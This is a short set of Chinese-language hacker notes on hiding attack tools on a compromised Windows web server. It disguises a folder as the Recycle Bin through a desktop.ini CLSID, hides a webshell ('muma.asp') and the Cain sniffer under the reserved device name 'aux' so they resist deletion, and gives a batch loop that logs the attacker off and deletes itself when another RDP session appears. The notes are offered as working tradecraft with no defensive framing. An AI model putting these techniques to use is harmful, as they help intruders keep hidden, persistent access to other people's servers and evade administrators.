=====
工具隐藏篇

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}


保存为desktop.ini  放入recycler文件夹, attrib recycler +s +r +h

==========
工具隐藏篇2
md \\.\d:\www\aux
move d:\www\cain\*.* \\.\d:\www\aux
copy muma.asp  \\.\d:\www\aux.asp
copy cain.exe \\.\d:\www\cain\aux.exe
del d:\www\cain\cain.exe


===============
CAIN嗅探篇

@echo off
:check
choice /C YN /T 7 /D Y
quser | find "#16"  && del %0 | logoff
goto check

说明一下
#16 每次运行这个 bat 的时候先quser 一下，看当前的会话id 是多少，然后加1 每连接一次就会加1
用户名 会话名 ID 状态 空闲时间 登录时间
administrator rdp-tcp#22 2 运行中 . 2009-4-16 19:24

你要把这个给改成 #23 就可以了 然后下一个连接进来的时候就会注销自已